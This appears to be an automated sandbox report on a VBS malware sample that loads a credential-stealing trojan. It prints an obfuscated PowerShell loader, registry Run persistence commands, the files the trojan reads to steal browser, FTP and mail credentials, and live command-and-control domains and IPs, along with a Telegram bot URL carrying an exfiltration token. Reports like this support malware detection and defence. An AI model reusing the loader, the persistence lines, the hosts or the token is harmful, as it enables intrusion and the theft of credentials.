'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0751D164 CreateNamedPipeW,

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Web Service            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts221
            Scripting            		11
            Registry Run Keys / Startup Folder            		12
            Process Injection            		11
            Deobfuscate/Decode Files or Information            		11
            Input Capture            		116
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts21
            Command and Scripting Interpreter            		Logon Script (Windows)11
            Registry Run Keys / Startup Folder            		221
            Scripting            		1
            Credentials in Registry            		22
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration11
            Encrypted Channel            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            PowerShell            		Logon Script (Mac)Logon Script (Mac)3
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object Model11
            Input Capture            		Scheduled Transfer1
            Non-Standard Port            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets241
            Virtualization/Sandbox Evasion            		SSH1
            Clipboard Data            		Data Transfer Size Limits3
            Non-Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common241
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 Channel114
            Application Layer Protocol            		Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items12
            Process Injection            		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755530 Sample: IMG_2022028022-0120.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 42 myfrontmannyfive.ddns.net 2->42 44 backupfrontmanny.duckdns.org 2->44 46 6 other IPs or domains 2->46 66 Snort IDS alert for network traffic 2->66 68 Multi AV Scanner detection for domain / URL 2->68 70 Yara detected GuLoader 2->70 72 6 other signatures 2->72 12 wscript.exe 1 1 2->12         started        signatures3 process4 signatures5 84 Wscript starts Powershell (via cmd or directly) 12->84 86 Obfuscated command line found 12->86 88 Very long command line found 12->88 15 powershell.exe 7 12->15         started        process6 signatures7 92 Very long command line found 15->92 18 powershell.exe 15->18         started        20 conhost.exe 15->20         started        process8 process9 22 ieinstal.exe 8 8 18->22         started        dnsIp10 48 myfrontmannyfive.ddns.net 37.0.14.209, 4939, 49815, 49818 WKD-ASIE Netherlands 22->48 50 backupfrontmanny.duckdns.org 84.38.134.104, 4939, 49814, 49816 DATACLUBLV Latvia 22->50 52 sinopbisikletkiralama.com 172.67.169.218, 49811, 80 CLOUDFLARENETUS United States 22->52 74 Creates multiple autostart registry keys 22->74 76 Tries to detect Any.run 22->76 26 wscript.exe 1 1 22->26         started        signatures11 process12 signatures13 78 Wscript starts Powershell (via cmd or directly) 26->78 80 Obfuscated command line found 26->80 82 Very long command line found 26->82 29 powershell.exe 15 26->29         started        process14 signatures15 90 Tries to detect Any.run 29->90 32 CasPol.exe 17 11 29->32         started        36 CasPol.exe 29->36         started        38 conhost.exe 29->38         started        process16 dnsIp17 40 api.telegram.org 149.154.167.220, 443, 49881 TELEGRAMRU United Kingdom 32->40 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->54 56 Tries to steal Mail credentials (via file / registry access) 32->56 58 Creates multiple autostart registry keys 32->58 64 4 other signatures 32->64 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->60 62 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->62 signatures18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            IMG_2022028022-0120.vbs0%VirustotalBrowse
            IMG_2022028022-0120.vbs0%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            myfrontmannyfive.ddns.net1%VirustotalBrowse
            backupfrontmanny.duckdns.org3%VirustotalBrowse
            sinopbisikletkiralama.com9%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://sinopbisikletkiralama.com/Bichloride.vbs0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            myfrontmannyfive.ddns.net
            		37.0.14.209
            		truetrueunknown
            backupfrontmanny.duckdns.org
            		84.38.134.104
            		truetrueunknown
            sinopbisikletkiralama.com
            		172.67.169.218
            		truefalseunknown
            api.telegram.org
            		149.154.167.220
            		truefalse
              		high
              f65kcg.am.files.1drv.com
              		unknown
              		unknownfalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high
                  f64nqg.am.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://sinopbisikletkiralama.com/Bichloride.vbstrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocumentfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      37.0.14.209
                      		myfrontmannyfive.ddns.netNetherlands
                      		198301WKD-ASIEtrue
                      149.154.167.220
                      		api.telegram.orgUnited Kingdom
                      		62041TELEGRAMRUfalse
                      84.38.134.104
                      		backupfrontmanny.duckdns.orgLatvia
                      		52048DATACLUBLVtrue
                      172.67.169.218
                      		sinopbisikletkiralama.comUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:755530
                      Start date and time:2022-11-28 20:42:33 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 16m 29s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:IMG_2022028022-0120.vbs
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                      Run name:Suspected Instruction Hammering
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winVBS@16/7@22/4
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, l-0004.l-msedge.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, login.live.com, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net
                      • Execution Graph export aborted for target powershell.exe, PID 6472 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      20:45:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hugi %tullio% -w 1 $Unrejoicing41=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Expansiveness;%tullio% ($Unrejoicing41)
                      20:45:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hugi %tullio% -w 1 $Unrejoicing41=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Expansiveness;%tullio% ($Unrejoicing41)
                      20:47:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Attractant %tullio% -w 1 $Sporing21=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Premodify;%tullio% ($Sporing21)
                      20:47:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Attractant %tullio% -w 1 $Sporing21=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Premodify;%tullio% ($Sporing21)

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.34726597513537405
                      Encrypted:false
                      SSDEEP:3:Nlll:Nll
                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
